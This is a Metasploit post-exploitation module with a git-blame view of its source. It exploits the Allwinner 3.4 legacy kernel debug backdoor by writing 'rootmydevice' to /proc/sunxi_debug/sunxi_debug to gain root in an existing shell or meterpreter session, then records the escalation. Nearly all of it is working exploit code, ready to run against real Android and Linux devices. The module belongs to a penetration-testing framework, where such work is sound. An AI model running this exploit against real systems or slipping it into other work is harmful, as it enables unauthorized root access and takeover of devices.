metasploit-framework/modules/post/multi/escalate/allwinner_backdoor.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require "msf/core"
#require "rex"

class MetasploitModule < Msf::Post

  include Msf::Post::File
  include Msf::Post::Linux::Priv

  def initialize(info={})
    super( update_info( info,
        "Name"           => "Allwinner 3.4 Legacy Kernel Local Privileges Escalation",
        "Description"    => %q{
          This module attempts to exploit a debug backdoor privilege escalation.
        },
        "License"        => MSF_LICENSE,
        "Author"         =>
          [
            "h00die <mike@stcyrsecurity.com>",  # Module
            "KotCzarny"                         # Discovery
          ],
        "Platform"       => [ "android", "linux" ],
        "DisclosureDate" => "Apr 30 2016",
        "References"     =>
          [
            [ "URL", "http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/"],
            [ "URL", "https://webcache.googleusercontent.com/search?q=cache:l2QYVUcDflkJ:https://github.com/allwinner-zh/linux-3.4-sunxi/blob/master/arch/arm/mach-sunxi/sunxi-debug.c+&cd=3&hl=en&ct=clnk&gl=us"],
            [ "URL", "http://irclog.whitequark.org/linux-sunxi/2016-04-29#16314390"]
          ],
        "SessionTypes"   => [ "shell", "meterpreter" ]
      ))

  end

  def run
    backdoor = "/proc/sunxi_debug/sunxi_debug"
    if file_exist?(backdoor)
      vprint_good "Backdoor found, exploiting."
      cmd_exec("echo rootmydevice > #{backdoor}")
      if is_root?
        print_good "Privilege Escalation Successful"
        report_note(
          :host => session,
          :type => "host.escalation",
          :data => "Escalated to root shell via backdoor"
        )
      else
        print_error "Privilege Escalation FAILED"
      end
    else
      print_error "Backdoor #{backdoor} not found."
    end
  end

end
module compiles, fails correctly but cant yet verify it works 2016-05-13 02:18:43 +00:00			`##`
			`# This module requires Metasploit: http://metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

working ready for pr 2016-05-18 01:58:32 +00:00			`require "msf/core"`
			`#require "rex"`
module compiles, fails correctly but cant yet verify it works 2016-05-13 02:18:43 +00:00
			`class MetasploitModule < Msf::Post`

			`include Msf::Post::File`
			`include Msf::Post::Linux::Priv`

			`def initialize(info={})`
			`super( update_info( info,`
working ready for pr 2016-05-18 01:58:32 +00:00			`"Name" => "Allwinner 3.4 Legacy Kernel Local Privileges Escalation",`
			`"Description" => %q{`
module compiles, fails correctly but cant yet verify it works 2016-05-13 02:18:43 +00:00			`This module attempts to exploit a debug backdoor privilege escalation.`
			`},`
working ready for pr 2016-05-18 01:58:32 +00:00			`"License" => MSF_LICENSE,`
			`"Author" =>`
module compiles, fails correctly but cant yet verify it works 2016-05-13 02:18:43 +00:00			`[`
working ready for pr 2016-05-18 01:58:32 +00:00			`"h00die <mike@stcyrsecurity.com>", # Module`
			`"KotCzarny" # Discovery`
module compiles, fails correctly but cant yet verify it works 2016-05-13 02:18:43 +00:00			`],`
working ready for pr 2016-05-18 01:58:32 +00:00			`"Platform" => [ "android", "linux" ],`
			`"DisclosureDate" => "Apr 30 2016",`
			`"References" =>`
module compiles, fails correctly but cant yet verify it works 2016-05-13 02:18:43 +00:00			`[`
working ready for pr 2016-05-18 01:58:32 +00:00			`[ "URL", "http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/"],`
			`[ "URL", "https://webcache.googleusercontent.com/search?q=cache:l2QYVUcDflkJ:https://github.com/allwinner-zh/linux-3.4-sunxi/blob/master/arch/arm/mach-sunxi/sunxi-debug.c+&cd=3&hl=en&ct=clnk&gl=us"],`
			`[ "URL", "http://irclog.whitequark.org/linux-sunxi/2016-04-29#16314390"]`
module compiles, fails correctly but cant yet verify it works 2016-05-13 02:18:43 +00:00			`],`
working ready for pr 2016-05-18 01:58:32 +00:00			`"SessionTypes" => [ "shell", "meterpreter" ]`
module compiles, fails correctly but cant yet verify it works 2016-05-13 02:18:43 +00:00			`))`

			`end`

			`def run`
working ready for pr 2016-05-18 01:58:32 +00:00			`backdoor = "/proc/sunxi_debug/sunxi_debug"`
module compiles, fails correctly but cant yet verify it works 2016-05-13 02:18:43 +00:00			`if file_exist?(backdoor)`
working ready for pr 2016-05-18 01:58:32 +00:00			`vprint_good "Backdoor found, exploiting."`
			`cmd_exec("echo rootmydevice > #{backdoor}")`
module compiles, fails correctly but cant yet verify it works 2016-05-13 02:18:43 +00:00			`if is_root?`
working ready for pr 2016-05-18 01:58:32 +00:00			`print_good "Privilege Escalation Successful"`
module compiles, fails correctly but cant yet verify it works 2016-05-13 02:18:43 +00:00			`report_note(`
			`:host => session,`
working ready for pr 2016-05-18 01:58:32 +00:00			`:type => "host.escalation",`
			`:data => "Escalated to root shell via backdoor"`
module compiles, fails correctly but cant yet verify it works 2016-05-13 02:18:43 +00:00			`)`
			`else`
working ready for pr 2016-05-18 01:58:32 +00:00			`print_error "Privilege Escalation FAILED"`
module compiles, fails correctly but cant yet verify it works 2016-05-13 02:18:43 +00:00			`end`
			`else`
working ready for pr 2016-05-18 01:58:32 +00:00			`print_error "Backdoor #{backdoor} not found."`
module compiles, fails correctly but cant yet verify it works 2016-05-13 02:18:43 +00:00			`end`
			`end`

			`end`